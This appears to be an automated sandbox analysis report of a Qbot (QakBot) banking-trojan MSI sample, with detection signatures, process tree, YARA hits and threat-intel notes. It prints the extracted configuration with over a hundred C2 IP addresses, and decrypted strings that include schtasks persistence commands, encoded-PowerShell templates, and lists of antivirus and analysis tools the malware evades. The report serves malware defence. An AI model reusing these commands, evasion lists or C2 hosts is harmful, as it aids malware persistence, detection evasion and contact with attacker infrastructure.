Edit tour

Windows Analysis Report
r3zg12.msi

Overview

General Information

Sample Name:	r3zg12.msi
Analysis ID:	878465
MD5:	665afc8f8b7972f427fe1bd90d263032
SHA1:	cc36e48f383750eb9416961b52ee3100b6e30688
SHA256:	d764436caf7114d880f982d208bd9514a433772dcac851f27c510d1597e26edd
Tags:	msi
Infos:

Detection

Qbot

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

C2 URLs / IPs found in malware configuration

Sample uses string decryption to hide its real strings

Potentially malicious time measurement code found

AV process strings found (often used to terminate AV products)

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

Connects to several IPs in different countries

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7048 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 1948 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

rundll32.exe (PID: 3156 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 676 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 4340 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

wscript.exe (PID: 6980 cmdline: wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
QakBot, qbotQbot	QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.	GOLD CABIN	http://contagiodump.blogspot.com/2010/11/template.html http://www.secureworks.com/research/threat-profiles/gold-lagoon http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7 https://asec.ahnlab.com/en/44662/	https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

Malware Configuration

Threatname: Qbot

{"Bot id": "obama265", "Campaign": "1685436052", "Version": "404.1320", "C2 list": ["103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "94.207.104.225:443", "89.114.140.100:443", "213.64.33.61:2222", "86.176.144.234:2222", "72.134.124.16:443", "47.34.30.133:443", "109.50.149.241:2222", "85.104.105.67:443", "81.111.108.123:443", "86.173.2.12:2222", "188.28.19.84:443", "41.228.224.161:995", "12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.184.103.97:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
decrypted.memstr	JoeSecurity_Qbot	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.rundll32.exe.2c90000.0.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
4.2.rundll32.exe.2c90000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.rundll32.exe.2da0830.1.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
4.2.rundll32.exe.2da0830.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.rundll32.exe.2da0830.1.raw.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
4.2.rundll32.exe.2da0830.1.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Qbot {"Bot id": "obama265", "Campaign": "1685436052", "Version": "404.1320", "C2 list": ["103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "94.207.104.225:443", "89.114.140.100:443", "213.64.33.61:2222", "86.176.144.234:2222", "72.134.124.16:443", "47.34.30.133:443", "109.50.149.241:2222", "85.104.105.67:443", "81.111.108.123:443", "86.173.2.12:2222", "188.28.19.84:443", "41.228.224.161:995", "12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.184.103.97:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078"]}

Sample uses string decryption to hide its real strings

Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: netstat -nao
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: runas
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ipconfig /all
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: net localgroup
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: nltest /domain_trusts /all_trusts
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Microsoft
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELF_TEST_1
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: p%08x
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Self test FAILED!!!
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Self test OK.
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: /t5
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: whoami /all
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cmd
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: route print
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .lnk
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: arp -a
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: net share
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cmd.exe /c set
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Self check
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %u;%u;%u;
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ProfileImagePath
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: at.exe %u:%u "%s" /I
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ProgramData
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Self check ok!
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: powershell.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: qwinsta
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: net view
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Component_08
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Start screenshot
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: schtasks.exe /Delete /F /TN %u
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: appidapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: c:\ProgramData
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Component_07
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: powershell.exe -encodedCommand %S
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: powershell.exe -encodedCommand
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: netstat -nao
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: runas
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ipconfig /all
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SystemRoot
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cscript.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/jpeg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LocalLow
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: displayName
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: shlwapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CommandLine
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: kernel32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: 1234567890
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wbj.go
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_DiskDrive
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: System32
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Name
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WRSA.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: c:\\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SpyNetReporting
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: FALSE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aswhookx.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Packages
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: RepUx.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Winsta0
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: root\SecurityCenter2
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: MsMpEng.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: userenv.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: csc_ui.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: \\.\pipe\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: pstorec.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: NTUSER.DAT
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: from
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: netapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: gdi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: setupapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: iphlpapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CrAmTray.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: user32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: \sf2.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Software\Microsoft
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %S.%06d
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: bcrypt.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wtsapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: shell32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: TRUE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Bios
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: /
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: https
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %s\system32\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Process
